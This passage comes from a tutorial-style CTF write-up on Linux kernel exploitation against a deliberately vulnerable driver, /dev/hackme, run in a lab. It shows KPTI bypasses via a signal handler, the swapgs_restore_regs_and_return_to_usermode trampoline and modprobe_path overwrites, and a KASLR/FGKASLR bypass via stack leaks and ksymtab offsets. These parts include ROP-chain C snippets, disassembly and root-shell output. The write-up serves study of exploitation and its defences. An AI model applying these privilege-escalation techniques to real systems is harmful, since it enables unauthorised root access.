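As a sketch of the registration step in isolation: the following code installs a SIGSEGV handler with the signature that signal() expects and forwards to an optional payload hook. The names segv_count, on_segv_payload, and install_segv_handler are made up for this illustration. In the exploit, the hook would be the function that checks the uid and spawns the shell.

```c
#include <signal.h>
#include <stddef.h>

/* Counts how often the handler ran (useful while debugging). */
volatile sig_atomic_t segv_count = 0;

/* Hypothetical hook: in the exploit this would point to the payload. */
void (*on_segv_payload)(void) = NULL;

/* Signal handlers take the signal number as their only argument. */
void segv_handler(int signo) {
    (void)signo;
    segv_count++;
    if (on_segv_payload)
        on_segv_payload();
}

/* Registers the handler; returns 0 on success and -1 on failure. */
int install_segv_handler(void (*payload)(void)) {
    on_segv_payload = payload;
    return signal(SIGSEGV, segv_handler) == SIG_ERR ? -1 : 0;
}
```

The handler must be installed before the overflow is triggered, so that it is already in place when the return to user mode faults.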
These are really the only changes that need to be made. But for the sake of completeness here is the full code.
KPTI Bypass 2: KPTI Trampolines
This is the idea that you can find in most writeups on bypassing KPTI. The main idea is that if a syscall returns normally, then there is a piece of code that achieves this. This code is called a KPTI trampoline and changes the page tables from kernel space to user space. It will swap the page tables and then execute swapgs and iretq, just like we did manually.
In Linux this function is called swapgs_restore_regs_and_return_to_usermode, and we can find its position by looking for it in the kallsyms. Note that we need administrative privileges for that.
# cat /proc/kallsyms | grep swapgs_restore_regs_and_return_to_usermode
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
Disassembling this function with radare2 can be done as shown below.
$ r2 -A vmlinux
...
[0xffffffff81e00000]> s 0xffffffff81200f10
[0xffffffff81200f10]> pdb
│ ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff8120137e(x)
│ ; DATA XREF from fcn.ffffffff8159fce0 @ 0xffffffff8159fced(x)
│ ; DATA XREF from fcn.ffffffff815a0180 @ 0xffffffff815a01ee(x)
│ 0xffffffff81200f10 415f pop r15
│ 0xffffffff81200f12 415e pop r14
│ 0xffffffff81200f14 415d pop r13
│ 0xffffffff81200f16 415c pop r12
│ 0xffffffff81200f18 5d pop rbp
│ 0xffffffff81200f19 5b pop rbx
│ 0xffffffff81200f1a 415b pop r11
│ 0xffffffff81200f1c 415a pop r10
│ 0xffffffff81200f1e 4159 pop r9
│ 0xffffffff81200f20 4158 pop r8
│ 0xffffffff81200f22 58 pop rax
│ 0xffffffff81200f23 59 pop rcx
│ 0xffffffff81200f24 5a pop rdx
│ 0xffffffff81200f25 5e pop rsi
│ 0xffffffff81200f26 4889e7 mov rdi, rsp
│ 0xffffffff81200f29 65488b2425.. mov rsp, qword gs:[0x6004]
│ 0xffffffff81200f32 ff7730 push qword [rdi + 0x30]
│ 0xffffffff81200f35 ff7728 push qword [rdi + 0x28]
│ 0xffffffff81200f38 ff7720 push qword [rdi + 0x20]
│ 0xffffffff81200f3b ff7718 push qword [rdi + 0x18]
│ 0xffffffff81200f3e ff7710 push qword [rdi + 0x10]
│ 0xffffffff81200f41 ff37 push qword [rdi]
│ 0xffffffff81200f43 50 push rax
│ ┌─< 0xffffffff81200f44 eb43 jmp 0xffffffff81200f89
[0xffffffff81200f41]> s 0xffffffff81200f89
[0xffffffff81200f89]> pdb
│ ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff81200f44(x)
│ 0xffffffff81200f89 58 pop rax
│ 0xffffffff81200f8a 5f pop rdi
│ 0xffffffff81200f8b ff15f7f0e300 call qword [0xffffffff82040088] ; swapgs
│ 0xffffffff81200f91 ff25e9f0e300 jmp qword [0xffffffff82040080] ; iretq
The swapgs and iretq can be found in the last call and the jmp. Apparently, this small stub is still mapped in memory, even when we are in user mode, as it is necessary to leave the kernel. I do not know exactly why this cannot be removed and needs to be accessible from user mode, but apparently that is how things are. Hence, we can use it to bypass KPTI.
The plan is to jump to swapgs_restore_regs_and_return_to_usermode+22, i.e., to 0xffffffff81200f26, which skips the initial pop instructions and lands right before the push operations. Note that at 0xffffffff81200f89 there are two additional pop instructions that we have to take care of.
What is left is to exchange the swapgs and iretq in our ROP chain with swapgs_restore_regs_and_return_to_usermode+22 and two dummy arguments that will be popped to RAX and RDI.
The full code is shown below.
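As a minimal sketch of only the tail of such a chain (not the complete exploit), the following C helper appends the stub address, the two dummy values, and the iretq frame to a payload buffer. The struct user_state, the helper name append_kpti_return, and the buffer handling are assumptions made for illustration. The stub address is the non-KASLR address from the disassembly above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* swapgs_restore_regs_and_return_to_usermode+22 without KASLR,
 * taken from the disassembly above (0xffffffff81200f10 + 22). */
#define KPTI_TRAMPOLINE (0xffffffff81200f10UL + 22)

/* Hypothetical container for the user-mode state saved before the overflow. */
struct user_state {
    uint64_t rip, cs, rflags, rsp, ss;
};

/*
 * Append the return-to-user part of the chain to payload[off...].
 * Returns the index after the last written slot.
 */
size_t append_kpti_return(uint64_t *payload, size_t off, size_t cap,
                          const struct user_state *st)
{
    assert(off + 8 <= cap);           /* 1 address + 2 dummies + 5 frame slots */
    payload[off++] = KPTI_TRAMPOLINE; /* lands on: mov rdi, rsp */
    payload[off++] = 0;               /* dummy slot at [rdi], ends up in rdi */
    payload[off++] = 0;               /* dummy slot at [rdi + 8], not read by the stub */
    payload[off++] = st->rip;         /* iretq frame starts at [rdi + 0x10] */
    payload[off++] = st->cs;
    payload[off++] = st->rflags;
    payload[off++] = st->rsp;
    payload[off++] = st->ss;
    return off;
}
```

In an exploit, the user_state values (the address of the function that spawns the shell, CS, RFLAGS, RSP, SS) would be filled in by the state-saving routine before the overflow is triggered.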
KPTI Bypass 3: Abuse Modprobe
The binary modprobe
is used to add or remove modules from the kernel.
Its path is stored in a global kernel variable that can be accessed in
/proc/sys/kernel/modprobe
and usually defaults to
/sbin/modprobe
. Further, a reference to this variable called
modprobe_path
can be found
in the kernel symbols accessible using /proc/kallsyms
, as it is a
kernel variable.
The game plan is to overwrite the path of modprobe with a filename of
a file containing custom commands. Overwriting modprobe_path
can be
performed using a ROP chain. The file containing the custom commands
can be created any way you like. The final execution of the file
referenced using modprobe_path
and hence our commands, can be
performed by calling execve
on a binary that has no format handler
specified.
The whole procedure is reminiscent of the fine intricacies of a theater play, albeit with actors that have strange names.
I will spare you the details and the code, but if you want to know more, you can find more information in paragraph “Version 3: Probing the mods” of this writeup.
There are also other so-called user mode helpers in addition to modprobe that
can be used in a similar way. As an example, the file
/proc/sys/kernel/core_pattern
contains the command that is used to
create coredumps. This can again be overwritten to point to an evil
binary, and then a coredump can be triggered to execute the evil binary.
Adding KASLR
Next, let us add KASLR back by adding kaslr
to run.sh
so we have -append "console=ttyS0 kpti=1 kaslr quiet panic=1"
.
Preliminaries
To understand KASLR, let us first start with Address Space Layout Randomization (ASLR).
ASLR is an exploit mitigation in user space that prevents building
reliable ROP chains. It was added to Linux around 2005. The main
idea is to randomize the memory layout,
such that the ROP gadgets are at different addresses in different runs
and thus cannot be reliably jumped to. There are various
implementations, some only randomize the .text
section, some
also randomize the stack, heap, and libraries.
Usually, the way to bypass ASLR is to get an address leak. If only the base address of the loaded executable is randomized, the offsets within the executable stay the same across runs. Hence, the addresses of the ROP gadgets can be computed from a single leaked address, and ASLR is bypassed.
Kernel ASLR (KASLR) is basically ASLR, but in kernel mode. It was
merged into Linux around 2014 in version 3.14. This original version
loads the kernel at a random base address, but leaves the relative offsets
within the kernel intact. It can be selected using the options kaslr
and nofgkaslr
in run.sh
.
In 2020, Function Granular KASLR (FGKASLR) was proposed as a patch set that provides a finer-grained kernel address space randomization. In particular, the kernel code is rearranged per function at boot. Hence, even when a kernel address leak exists, it is hard to exploit, as a single leak no longer reveals the addresses of the other functions.
Reconnaissance
The introduction of KASLR breaks all our previously developed exploits, as it changes the addresses of the ROP gadgets.
There are two places where we can start our investigation.
We can leak the stack and compare how it changes between different
runs.
Or we can modify initramfs/etc/inittab
to give us a root shell so we
can read /proc/kallsyms
and compare the
addresses of the kernel symbols between multiple runs.
Investigating the Stack
We already developed leak_stack.c
above which allows us to read the
stack.
We executed this file two times and stored the output in stack1.txt
and stack2.txt
.
Comparing the two outputs using diff stack1.txt stack2.txt
yields
the following.
3c3
< [+] offset 0 contains value: 0xffffffffa53648f0
---
> [+] offset 0 contains value: 0xffffffff8f8d0280
5,7c5,7
< [+] offset 2 contains value: 0xcd9ac705e3874700
< [+] offset 3 contains value: 0xffff981606caef10
< [+] offset 4 contains value: 0xffffaa5a001bfe68
---
> [+] offset 2 contains value: 0x310671060c9fe500
> [+] offset 3 contains value: 0xffff97ae86cae610
> [+] offset 4 contains value: 0xffffa424c01bfe68
9,15c9,15
< [+] offset 6 contains value: 0xffff981606caef00
< [+] offset 7 contains value: 0xffffaa5a001bfef0
< [+] offset 8 contains value: 0xffff981606caef00
< [+] offset 9 contains value: 0xffffaa5a001bfe80
< [+] offset 10 contains value: 0xffffffffa5749a47
< [+] offset 11 contains value: 0xffffffffa5749a47
< [+] offset 12 contains value: 0xffff981606caef00
---
> [+] offset 6 contains value: 0xffff97ae86cae600
> [+] offset 7 contains value: 0xffffa424c01bfef0
> [+] offset 8 contains value: 0xffff97ae86cae600
> [+] offset 9 contains value: 0xffffa424c01bfe80
> [+] offset 10 contains value: 0xffffffff8fd3d9c7
> [+] offset 11 contains value: 0xffffffff8fd3d9c7
> [+] offset 12 contains value: 0xffff97ae86cae600
17,19c17,19
< [+] offset 14 contains value: 0x7ffeda3ac880
< [+] offset 15 contains value: 0xffffaa5a001bfea0
< [+] offset 16 contains value: 0xcd9ac705e3874700
---
> [+] offset 14 contains value: 0x7ffe51038100
> [+] offset 15 contains value: 0xffffa424c01bfea0
> [+] offset 16 contains value: 0x310671060c9fe500
....
We can see that some addresses are similar in both runs. E.g., at offset 15 we had 0xffffaa5a001bfea0 and 0xffffa424c01bfea0. The last seven hex digits (three and a half bytes) are the same: 01bfea0.
If we squint hard enough, we can also see which lines are the same in
both files.
Another approach is using the comm
command, which immediately gives us the lines that are identical in
both files, but only
works on sorted inputs.
$ comm -12 <(sort stack1.txt) <(sort stack2.txt)
[*] trying to leak up to 320 bytes memory
[+] offset 1 contains value: 0x2a
[+] offset 13 contains value: 0x0
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 29 contains value: 0x0
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 39 contains value: 0x0
[+] offset 5 contains value: 0x4
[+] successfully opened /dev/hackme
Here, we see that all values that stay the same are parameters and not addresses.
If we leak more values from the stack, we find more values that are similar between different runs. In particular, we are interested in values whose low-order digits stay the same across runs. The idea is that such a leaked value is the randomized base address plus a fixed offset. As the fixed offset is the same in every run, we can compute the address of any function whose distance to the leaked value we know.
How do we know if a leaked value is valuable? We can search for it in
/proc/kallsyms
and if it corresponds to a symbol, it may be
valuable, as we can compute offsets from that symbol.
As an example, if we set the lower two bytes of the value at the stack offset 38 to zero, we arrive at the base address of the kernel.
/ # ./leak_stack | grep 38
[+] offset 38 contains value: 0xffffffffa680a157
/ # grep ffffffffa6800000 /proc/kallsyms
ffffffffa6800000 T _text
ffffffffa6800000 T startup_64
ffffffffa6800000 T _stext
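The masking step can be sketched in C as follows. The function names and the constant LEAK38_OFFSET are chosen here for illustration. The sketch assumes that the value at offset 38 always points into the first 64 KiB of the kernel image, as it does in the run above.

```c
#include <stdint.h>

/* Offset of the leaked value from the kernel base in the run above:
 * 0xffffffffa680a157 - 0xffffffffa6800000. */
#define LEAK38_OFFSET 0xa157UL

/* Variant 1: clear the lower two bytes of the leaked address. */
uint64_t kernel_base_by_mask(uint64_t leaked)
{
    return leaked & ~(uint64_t)0xffff;
}

/* Variant 2: subtract the known fixed offset of the leaked address. */
uint64_t kernel_base_by_offset(uint64_t leaked)
{
    return leaked - LEAK38_OFFSET;
}
```

Both variants give the same result as long as the leaked return address does not change, which would only happen with a different kernel build.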
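Another useful stack leak is at offset 41. Setting the lower two bytes to zero again yields the address of a symbol in the kernel symbol table. Note that the grep below also matches two unrelated lines that merely contain the digits 41.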
/ # ./leak_stack | grep 41
[+] offset 41 contains value: 0xffffffffa6a0008c
[+] offset 53 contains value: 0x417421
[+] offset 58 contains value: 0x417421
/ # grep ffffffffa6a00000 /proc/kallsyms
ffffffffa6a00000 T native_usergs_sysret64
ffffffffa6a00000 T __entry_text_start
Note that we could now start to rebuild our ROP chain by computing the base address of the kernel from the stack offset 38. The addresses of the ROP gadgets can then be computed from their offsets to the kernel base address. This works for the old implementation of KASLR, i.e., for KASLR without FGKASLR.
We need to set nofgkaslr
in run.sh
.
Then, the following code implements the attack on simple KASLR that
only adds a random offset to the kernel base address.
Executing this code yields the following:
/ $ ./exploit_kaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x7db22304978a2500 at offset 16
[+] leaked kernel_base 0xffffffffb3a00000
[+] leaked prepare_kernel_cred 0xffffffffb3ec67f0
[+] leaked ksymtab_commit_creds 0xffffffffb3ec6410
[+] we are root (uid = 0)
The next step is dealing with full FGKASLR, where the randomization takes place at the granularity of functions.
Comparing Addresses of Kernel Symbols
After investigating the stack, let us now compare the location of
kernel symbols for different runs.
For this, we need to modify initramfs/etc/inittab
to give us a root shell so we
can access /proc/kallsyms
.
We execute run.sh
and then take a look at /proc/kallsyms
.
For this, we needed to increase the size of the scrollback buffer of the terminal so that we could simply cat /proc/kallsyms and copy the output.
Then, we repeated this for a second run.
Comparing the locations of the kernel symbols for these two runs,
e.g., using vimdiff
shows that FGKASLR does not apply to the whole
kernel space.
Below we see an excerpt of the first run.
ffffffffa7200000 T _text
...
ffffffffa7600dc6 T __x86_retpoline_r15
ffffffffa7600de0 T pm_wakeup_source_sysfs_add
...
And here is an excerpt of the second run.
ffffffff83e00000 T _text
...
ffffffff84200dc6 T __x86_retpoline_r15
ffffffff84200de0 T agp_bind_memory
...
For the section between _text
and __x86_retpoline_r15
, we see that
only the three hex digits after ffffffff
are different. The order of the
symbols and also their relative distances are the same. Hence, this is
only affected by KASLR, but not FGKASLR.
The length of this area is ffffffff84200dc6 - ffffffff83e00000 = 400dc6
.
After this area, the order of the functions is randomized. This is where FGKASLR is applied.
What is not shown in the excerpt is that even later, starting from the
symbol __start_rodata
to the end, again only KASLR is applied.
As suggested by the name, this section contains read-only data. It is not executable and hence cannot be used directly for ROP gadgets. However, it contains structs such as the ksymtab entries, which can be used to calculate addresses.
As an example both functions prepare_kernel_cred
and commit_creds
are in the section randomized using FGKASLR. Hence, we cannot compute
their offsets, given the kernel base address naively. But within
ksymtab there are the structs __ksymtab_prepare_kernel_cred
and
__ksymtab_commit_creds
.
These are defined as follows.
If we add the value_offset
to the address of the entry symbol, then
we find the actual symbol. Thus, we can compute the addresses of
prepare_kernel_cred
and commit_creds
using an appropriate ROP
chain, even though these symbols reside in the memory area using
FGKASLR.
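As a sketch of this computation: on kernels built with CONFIG_HAVE_ARCH_PREL32_RELOCATIONS (the usual case on x86-64), a symbol table entry stores 32-bit offsets relative to the address of the field itself. The struct below mirrors that layout with int32_t instead of the kernel's int. The helper resolve_ksymtab is a hypothetical name introduced here.

```c
#include <stdint.h>

/* Layout of a symbol table entry with relative references. */
struct kernel_symbol {
    int32_t value_offset;     /* symbol address, relative to &value_offset */
    int32_t name_offset;      /* symbol name, relative to &name_offset */
    int32_t namespace_offset; /* namespace string, relative to its field */
};

/*
 * value_offset is the first field, so its address equals the address of
 * the entry. The offset is signed: the symbol may lie below the entry.
 */
uint64_t resolve_ksymtab(uint64_t entry_addr, int32_t value_offset)
{
    return entry_addr + (uint64_t)(int64_t)value_offset;
}
```

In the exploit, entry_addr would be the rebased address of __ksymtab_commit_creds and value_offset the 32-bit value read from that address by the ROP chain.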
Further, if we take a look at the ROP gadgets that we used previously,
we see that all of them reside in the KASLR section, except
for mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203;
that resides in
the FGKASLR section.
We can filter for gadgets in the correct section using
ROPGadget (pip install ROPGadget
)
with ROPgadget --binary ./vmlinux --range
0xffffffff81000000-0xffffffff81400dc6
.
Or using ropr (cargo install
ropr
)
with ropr --range "0xffffffff81000000-0xffffffff81400dc6" ./vmlinux
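The same range check can be expressed in C, for instance to sanity-check gadget addresses hardcoded in an exploit. This is only a sketch: the names are made up here, and the bounds are the static (non-KASLR) addresses of the area between _text and __x86_retpoline_r15 that are used in the commands above.

```c
#include <stdbool.h>
#include <stdint.h>

#define STATIC_BASE    0xffffffff81000000UL /* _text without KASLR */
#define KASLR_ONLY_END 0xffffffff81400dc6UL /* STATIC_BASE + 0x400dc6 */

/* True if a static gadget address lies in the area that FGKASLR leaves intact. */
bool gadget_survives_fgkaslr(uint64_t static_addr)
{
    return static_addr >= STATIC_BASE && static_addr < KASLR_ONLY_END;
}
```

With these bounds, the gadget at 0xffffffff816bf203 mentioned above is rejected, while the KPTI trampoline at 0xffffffff81200f26 is accepted.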
As we know that without KASLR a kernel is loaded at 0xffffffff81000000
, we
can quickly compute the offsets. As an example, in the previous
exploit using a signal for the KPTI bypass, we had the following ROP
gadget.
With KASLR, this becomes the following.
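A minimal sketch of this rebasing arithmetic, assuming the leaked kernel base is already known. The helper name rebase and the constant STATIC_BASE are introduced here for illustration and are not taken from the exploit code.

```c
#include <stdint.h>

#define STATIC_BASE 0xffffffff81000000UL /* kernel base without KASLR */

/* Translate an address from the static image to the randomized kernel. */
uint64_t rebase(uint64_t static_addr, uint64_t kernel_base)
{
    return kernel_base + (static_addr - STATIC_BASE);
}
```

This only gives correct results for addresses in the areas that are shifted as a whole, i.e., the start of the text section and the read-only data.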
Leaking the Addresses of prepare_kernel_cred
and commit_creds
For our exploit we need the addresses of the functions prepare_kernel_cred
and commit_creds
.
Unfortunately for us, both of these symbols are in a section of the kernel that is affected by FGKASLR.
Hence, we cannot compute their addresses in the kernel by adding a fixed offset
to the kernel base.
However, we already saw that there is a section at the end of the kernel
memory containing read-only data whose addresses are randomized using only KASLR and not FGKASLR.
This section contains the structs __ksymtab_prepare_kernel_cred
and
__ksymtab_commit_creds
whose addresses we could compute.
From these, we can compute the addresses of prepare_kernel_cred
and commit_creds
.
So let us start by computing the addresses of __ksymtab_prepare_kernel_cred
and
__ksymtab_commit_creds
by adding their offsets to the kernel base address.
For this, we modified the function leak_cookie()
as follows:
Running this yields the real addresses
of the symbols, as can be shown when contrasting with the true
location within /proc/kallsyms
.
/ # ./leak_cookie
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xaec7370351852800
[+] leaked kernel_base 0xffffffffbd600000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffbe58d4fc
[+] leaked ksymtab_commit_creds 0xffffffffbe587d90
/ # cat /proc/kallsyms | grep ffffffffbe58d4fc
ffffffffbe58d4fc r __ksymtab_prepare_kernel_cred
/ # cat /proc/kallsyms | grep ffffffffbe587d90
ffffffffbe587d90 r __ksymtab_commit_creds
What remains is to compute the location of
prepare_kernel_cred
from __ksymtab_prepare_kernel_cred
and the location of commit_creds
from
__ksymtab_commit_creds
.
Remember that the kernel symbols structs are defined as follows:
Hence, we can now use ROP gadgets to store ksymtab_commit_creds - 0x10 in rax, read the value_offset, and obtain the memory location of commit_creds by adding the value_offset to the location of ksymtab_commit_creds.
The full code to compute the memory location of commit_creds
is as follows.
Executing this yields the following.
/ # ./leak_commit_creds
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xbde6cd8832184c00
[+] leaked kernel_base 0xffffffffb3000000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffb3f8d4fc
[+] leaked ksymtab_commit_creds 0xffffffffb3f87d90
[+] leaked commit_creds 0xb385a200
Segmentation fault
The printed value matches the lower 32 bits of the true location of the symbol commit_creds,
as we can easily verify.
/ # cat /proc/kallsyms | grep b385a200
ffffffffb385a200 T commit_creds
The memory location of prepare_kernel_cred
can be retrieved similarly.
Game Plan
After showing these building blocks, we can now stitch together the
complete game plan for exploiting the kernel driver with FGKASLR.
We can leak enough values of the stack to get the base address of the
kernel at offset 38.
Then, we can craft a ROP chain with gadgets in the memory area that is
only affected by KASLR, but not by FGKASLR.
This ROP chain reads the kernel symbol table entries in the read-only data
section of kernel memory. The offsets of these entries can again be
computed, as they are at a constant offset of the kernel base address and
are not affected by FGKASLR, but again only by KASLR.
We use these entries to read the address of the functions
prepare_kernel_cred
and commit_creds
. Even though these functions
are in the memory area affected by FGKASLR, we can know their
addresses, as they are stored in the kernel symbol table.
Then, we need to execute prepare_kernel_cred
and commit_creds
as
before and should be presented with a root shell.
What remains is to circumvent the need for a gadget that moves the
result from prepare_kernel_cred
to commit_creds
, i.e., from rax to
rdi.
Previously, we had a gadget for this, but it is in the section
affected by FGKASLR and hence not available anymore.
Complete Code
We will now present the complete code for the exploit that works with FGKASLR enabled.
Executing the code looks as follows.
/ $ id
uid=1000 gid=1000 groups=1000
/ # ./exploit_fgkaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xc2f94f03356f4600
[+] leaked kernel_base 0xffffffff86e00000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffff87d8d4fc
[+] leaked ksymtab_commit_creds 0xffffffff87d87d90
[+] leaked commit_creds 0xffffffff874ef630
[+] leaked prepare_kernel_cred 0xffffffff8791bd70
[+] returned creds_struct 0xffff93cd472e1780
[+] we are root (uid = 0)
Conclusion/Summary
That was a long article. Congrats if you made it this far. If you skipped some parts or forgot the start of the article, here are the most important points that should stick with you.
In general, in kernel space you do not simply run shellcode that pops a shell. You want to
execute commit_creds(prepare_kernel_cred(0))
and return back to user
space. This gives you an elevated prompt.
If you encounter SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention), you cannot use code from user space in kernel exploits. To bypass this, you need to write a ROP chain with gadgets from the kernel.
If you encounter KPTI (Kernel Page Table Isolation) there are various bypasses. The most common one is to make use of a KPTI trampoline. This is the code that syscalls execute when they go back to user space. You can find the other bypasses above in the article.
Finally, if you encounter Kernel ASLR (Address Space Layout Randomization), you need to check whether it works at the granularity of functions or whether the whole kernel is moved by a single offset. In the second case, a single kernel address leak is enough to recover all addresses. If FGKASLR is used, there are still parts of the kernel that are only moved by a single offset. Again, a kernel address leak allows constructing ROP chains from these memory locations.
Resources
There are lots of writeups for exactly this challenge and I have read several of them, as they focus on different aspects. Some code parts are lifted from these other writeups. Without these writeups my guide could not have existed. We really stand on the shoulders of giants.
- https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/
- https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/
- https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
- https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/
- https://hxp.io/blog/81/hxp-CTF-2020-kernel-rop/
- https://blog.wohin.me/posts/linux-kernel-pwn-01/